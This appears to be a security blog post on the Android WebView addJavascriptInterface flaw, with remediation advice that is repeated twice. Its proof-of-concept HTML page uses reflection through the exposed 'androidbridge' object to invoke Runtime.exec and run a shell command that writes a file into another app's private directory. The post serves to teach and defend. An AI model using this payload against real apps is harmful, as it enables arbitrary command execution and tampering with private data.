Enabling the addJavaScriptInterface method allows JavaScript hosted in
WebView to directly invoke methods in an app through a JavaScript
interface. Any untrusted content hosted in the WebView could potentially
use reflection to figure out the public methods within the JavaScript
Interface object and make use of them. Additionally, an attacker can
also make use of reflection to replace contents in the application's
private directory.
In the below code androidbridge is the exposed JavaScript bridge.
( PS : I shall fix the formatting issues and beautify the code in some time )
Where "androidbridge" is the name for injected java object (JSInterface) in the webview.
Solution: Beginning in Android 4.2, developers must explicitly annotate public methods with @JavascriptInterface in order to make them accessible by hosted JavaScript. Note: This also takes effect only if the developer sets the application's minSdkVersion or targetSdkVersion to 17 or higher. Set the application's minSdkVersion or targetSdkVersion to 17 or higher so that hosted JavaScript can access only explicitly annotated Java methods.
Another solution would be to navigate to domains outside the whitelisted domains, by using shouldOverrideUrlLoading, checking if the domain is allowed and using the default Android browser, rather than the WebView to open the URL if it is not trusted.
Ref: [1] http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface%28java.lang.Object,%20java.lang.String%29 [2] http://android-developers.blogspot.com/2013/02/security-enhancements-in-jelly-bean.html
In the below code androidbridge is the exposed JavaScript bridge.
( PS : I shall fix the formatting issues and beautify the code in some time )
<!DOCTYPE html > <html> <head > <meta content="text/html;charset=UTF -8" http -equiv="content -type"> <script > function execute(cmdArgs) { var temp = androidbridge.getClass ().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null ,null); temp.exec(cmdArgs); return 1; } var maliciousContents = "isecPartners"; execute (["/system/bin/sh","-c","echo '" +maliciousContents +"' > /data/data/com.goodcompany.private.directory/evilFile"]); </script >
<body > No Content here </body > </html >
webView.addJavascriptInterface(new JSInterface(this), "androidbridge");
Solution: Beginning in Android 4.2, developers must explicitly annotate public methods with @JavascriptInterface in order to make them accessible by hosted JavaScript. Note: This also takes effect only if the developer sets the application's minSdkVersion or targetSdkVersion to 17 or higher. Set the application's minSdkVersion or targetSdkVersion to 17 or higher so that hosted JavaScript can access only explicitly annotated Java methods.
Another solution would be to navigate to domains outside the whitelisted domains, by using shouldOverrideUrlLoading, checking if the domain is allowed and using the default Android browser, rather than the WebView to open the URL if it is not trusted.
Ref: [1] http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface%28java.lang.Object,%20java.lang.String%29 [2] http://android-developers.blogspot.com/2013/02/security-enhancements-in-jelly-bean.html
No comments:
Post a Comment